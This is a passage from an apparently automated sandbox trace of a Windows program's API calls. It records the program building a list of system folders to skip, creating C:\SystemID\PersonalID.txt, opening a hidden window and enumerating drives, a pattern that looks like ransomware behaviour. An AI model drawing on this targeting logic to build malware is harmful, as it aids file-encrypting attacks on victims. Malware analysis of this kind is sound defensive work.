dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.191] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.191] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x818) returned 0x33b9228 [0108.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1036 | out: lpWideCharStr=".regtrans-ms") returned 13 [0108.191] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33bf390 [0108.191] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.191] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.191] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.191] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.191] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.191] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x818) returned 0x33b9228 [0108.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1036 | out: lpWideCharStr="C:\\SystemID\\") returned 13 [0108.191] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33bfbb8 [0108.192] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.192] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.192] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.192] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.192] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.192] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.192] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x82c) returned 0x33c03e0 [0108.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c03e0, cchWideChar=1046 | out: lpWideCharStr="C:\\Users\\Default User\\") returned 23 [0108.192] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x33c0c18 [0108.192] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c03e0 | out: hHeap=0x730000) returned 1 [0108.192] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.192] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1c8) returned 0x3395ad0 [0108.192] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a3c70 | out: hHeap=0x730000) returned 1 [0108.192] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.192] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.192] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.193] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.193] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.193] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c03e0 [0108.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c03e0, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0108.193] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x33c1450 [0108.193] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c03e0 | out: hHeap=0x730000) returned 1 [0108.193] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.193] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.193] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.193] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.193] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.193] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.193] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x826) returned 0x33c03e0 [0108.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c03e0, cchWideChar=1043 | out: lpWideCharStr="C:\\Users\\All Users\\") returned 20 [0108.193] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x33c1c88 [0108.194] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c03e0 | out: hHeap=0x730000) returned 1 [0108.194] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.194] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.194] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x822) returned 0x33c03e0 [0108.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c03e0, cchWideChar=1041 | out: lpWideCharStr="C:\\Users\\Default\\") returned 18 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x33c24c0 [0108.194] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c03e0 | out: hHeap=0x730000) returned 1 [0108.194] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.194] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.194] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.194] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x834) returned 0x33c2cf8 [0108.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c2cf8, cchWideChar=1050 | out: lpWideCharStr="C:\\Documents and Settings\\") returned 27 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x33c3538 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c2cf8 | out: hHeap=0x730000) returned 1 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x81e) returned 0x33c03e0 [0108.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33c03e0, cchWideChar=1039 | out: lpWideCharStr="C:\\ProgramData\\") returned 16 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c2cf8 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c03e0 | out: hHeap=0x730000) returned 1 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x818) returned 0x33b9228 [0108.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1036 | out: lpWideCharStr="C:\\Recovery\\") returned 13 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c03e0 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2a0) returned 0x3385f38 [0108.195] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3395ad0 | out: hHeap=0x730000) returned 1 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.195] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.196] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.196] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.196] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.196] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x83a) returned 0x33c3d80 [0108.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c3d80, cchWideChar=1053 | out: lpWideCharStr="C:\\System Volume Information\\") returned 30 [0108.196] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x33c45c8 [0108.196] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c3d80 | out: hHeap=0x730000) returned 1 [0108.196] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.196] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.196] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.196] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.196] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.196] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.196] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x848) returned 0x33c4e10 [0108.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3382f00, cbMultiByte=-1, lpWideCharStr=0x33c4e10, cchWideChar=1060 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Roaming\\") returned 37 [0108.197] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x33c5660 [0108.197] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c4e10 | out: hHeap=0x730000) returned 1 [0108.197] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.197] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.197] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.197] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc76) returned 0x33c5eb8 [0108.197] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c5660 | out: hHeap=0x730000) returned 1 [0108.197] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.197] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.197] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.197] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x844) returned 0x33c4e10 [0108.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3382f00, cbMultiByte=-1, lpWideCharStr=0x33c4e10, cchWideChar=1058 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Local\\") returned 35 [0108.198] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x33c5660 [0108.198] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c4e10 | out: hHeap=0x730000) returned 1 [0108.198] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.198] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.198] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.198] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc76) returned 0x33c6b38 [0108.198] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c5660 | out: hHeap=0x730000) returned 1 [0108.198] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.198] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.198] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x816) returned 0x33b9228 [0108.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1035 | out: lpWideCharStr="C:\\Windows\\") returned 12 [0108.198] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c77b8 [0108.198] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.198] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.198] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.198] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.199] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x818) returned 0x33b9228 [0108.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1036 | out: lpWideCharStr="C:\\PerfLogs\\") returned 13 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c3d80 [0108.199] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.199] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.199] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x832) returned 0x33c4e10 [0108.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c4e10, cchWideChar=1049 | out: lpWideCharStr="C:\\ProgramData\\Microsoft\\") returned 26 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x33c5650 [0108.199] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c4e10 | out: hHeap=0x730000) returned 1 [0108.199] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.199] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.199] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.199] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x83a) returned 0x33c7fe8 [0108.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c7fe8, cchWideChar=1053 | out: lpWideCharStr="C:\\ProgramData\\Package Cache\\") returned 30 [0108.200] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x33c8830 [0108.200] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c7fe8 | out: hHeap=0x730000) returned 1 [0108.200] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.200] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.200] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.200] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.200] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.200] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.200] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c4e10 [0108.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c4e10, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0108.200] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x33c7fe8 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c4e10 | out: hHeap=0x730000) returned 1 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c4e10 [0108.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c4e10, cchWideChar=1040 | out: lpWideCharStr="C:\\$Recycle.Bin\\") returned 17 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x33c9078 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c4e10 | out: hHeap=0x730000) returned 1 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x3f0) returned 0x33b83b8 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3385f38 | out: hHeap=0x730000) returned 1 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.201] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c4e10 [0108.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33944c0, cbMultiByte=-1, lpWideCharStr=0x33c4e10, cchWideChar=1040 | out: lpWideCharStr="C:\\$WINDOWS.~BT\\") returned 17 [0108.201] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x33c98b0 [0108.202] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c4e10 | out: hHeap=0x730000) returned 1 [0108.202] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.202] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.202] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.202] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.202] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.202] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33b9228 [0108.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d2a8, cbMultiByte=-1, lpWideCharStr=0x33b9228, cchWideChar=1032 | out: lpWideCharStr="C:\\dell\\") returned 9 [0108.202] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x33c4e10 [0108.202] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0108.202] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f00 [0108.202] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20) returned 0x33944c0 [0108.202] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33944c0 | out: hHeap=0x730000) returned 1 [0108.202] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f00 | out: hHeap=0x730000) returned 1 [0108.205] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d010, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0108.205] GetLastError () returned 0x3 [0108.205] GetLastError () returned 0x3 [0108.205] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0108.206] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18d010, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x68c [0108.206] GetFileType (hFile=0x68c) returned 0x1 [0108.206] GetLastError () returned 0x0 [0108.216] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0108.216] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0108.216] RegisterClassExW (param_1=0x18d288) returned 0xc166 [0108.216] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x6011c [0108.217] NtdllDefWindowProc_W () returned 0x0 [0108.217] NtdllDefWindowProc_W () returned 0x1 [0108.219] NtdllDefWindowProc_W () returned 0x0 [0108.575] NtdllDefWindowProc_W () returned 0x0 [0108.575] ShowWindow (hWnd=0x6011c, nCmdShow=0) returned 0 [0108.575] UpdateWindow (hWnd=0x6011c) returned 1 [0108.575] GetLogicalDrives () returned 0x4 [0108.575] SetErrorMode (uMode=0x1) returned 0x0 [0108.575] PathFileExistsA (pszPath="C:\\") returned 1 [0108.576] SetErrorMode (uMode=0x0) returned 0x1 [0108.576] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x806) returned 0x33be360 [0108.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d240, cbMultiByte=-1, lpWideCharStr=0x33be360, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33beb70 [0108.576] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33be360 | out: hHeap=0x730000) returned 1 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x18) returned 0x3315558 [0108.576] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33beb70 | out: hHeap=0x730000) returned 1 [0108.576] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3315558 | out: hHeap=0x730000) returned 1 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x18) returned 0x3315558 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x10) returned 0x337c640 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x8ec) returned 0x33be360 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x33bec58 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bbef40 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1070) returned 0x33b9a48 [0108.576] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f4e8 [0108.577] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, 